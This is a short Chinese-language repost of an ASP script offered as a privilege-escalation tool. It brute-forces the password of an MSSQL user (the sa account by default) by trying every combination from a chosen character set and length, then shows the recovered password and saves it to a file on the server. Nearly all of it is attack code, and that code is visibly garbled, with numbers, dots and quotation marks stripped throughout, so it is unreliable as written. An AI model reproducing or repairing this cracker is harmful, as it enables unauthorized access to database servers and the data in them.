ASP提權暴力破解MSSQL用戶密碼

    一個暴力破解MSSQL用戶密碼的ASP程序以下這個版本是可以運行之後關閉浏覽器運行完畢將在當前目錄生成結果文件的
    CODE:
    <%
    ============ ASP Port Scanner by lake ===================
    ×
    Version:
    For SpringBoard
    ==========================================================
    %>
    <style type=text/css>
    bodytdth {color: #FF;fontfamily: Verdana Arial Helvetica sansserif;}
    body {backgroundcolor: #ffffff;fontsize:px; }
    a:link {color: #FF;textdecoration: none;}
    a:visited {textdecoration: none;color: #FF;}
    a:hover {textdecoration: none;color: #FF;}
    a:active {textdecoration: none;color: #FF;}
    buttom {color: #FFFFFF; border: px solid #BE; backgroundcolor: #BC}
    TextBox {border: px solid #BE}
    styleRed {color: #FF}
    </style>
    <title>MSSQL Cracker for SpringBoard</title>
    <%
    Dim Password()
    If RequestForm(go) <> ″ Then
    %>
    <div align=center>Welcome to <a href=× target=_blank>×</a> </div>
    <form name=form″ method=post action= onSubmit=formSubmitdisabled=true;>
    ConnStr:
    <input name=conn type=text id=conn value=Provider=SQLOLEDB;Data Source=;User ID=sa;Password={PASS}; size=″>
    <br>
    Char:
    <input name=char type=text id=char value=″ size=″>
    <br>
    Length:
    <input name=len type=text id=len value=″ size=″>
    <br>
    Path:
    <input name=path type=text value=<%=ServerMapPath(rtxt)%> size=″>
    <input name=CFile type=checkbox id=CFile value=″ checked>
    Enablel<br>
    <input name=go type=hidden id=go value=″>
    <br>
    <input name=Submit type=submit id=Submit value= Run >
    </form>
    <%

    Else
    timer = timer
    ServerScriptTimeout =
    ConnStr = RequestForm(Conn)
    Char = requestForm(char)
    LenChar = Len(Char)
    ReDim password(LenChar)
    For i = to LenChar
    password(i) = Mid(Char i )
    Next
    length = CInt(requestForm(len))
    Call LAKE()
    responseWrite Done!<br>Process & tTime & s
    If requestForm(CFile) <> Then CreateResult(Done! & vbcrlf & tTime)
    End If
    Sub LAKE(str)
    If Len(str) >= length Then Exit Sub
    For j = to LenChar
    pass = str & password(j)
    If Len(pass) = length Then Call Crack(pass)
    Call LAKE(pass)
    Next
    End Sub
    Sub Crack(str)
    On Error Resume Next
    Set conn = ServerCreateObject(nnection)
    connopen Replace(ConnStr{PASS}str)
    If Err Then
    If ErrNumber <> Then
    responseWrite(ErrDescription & <BR>)
    responseEnd()
    End If
    Else
    responseWrite(I Get it ! Password is <font color=red> & str & </font><BR>Process & tTime & s)
    If requestForm(CFile) <> Then CreateResult(str & vbcrlf & tTime)
    responseEnd()
    End If
    End Sub
    Function tTime()
    timer = timer
    thetime=cstr(int(timertimer))
    tTime = thetime
    End Function
    Sub CreateResult(t)
    Set fs = CreateObject(ScriptingFileSystemObject)
    Set outfile = fsCreateTextFile(requestForm(path))
    outfileWriteLine t
    Set fs = Nothing
    End Sub
    %>

From:http://tw.wingwit.com/Article/program/MySQL/201311/29377.html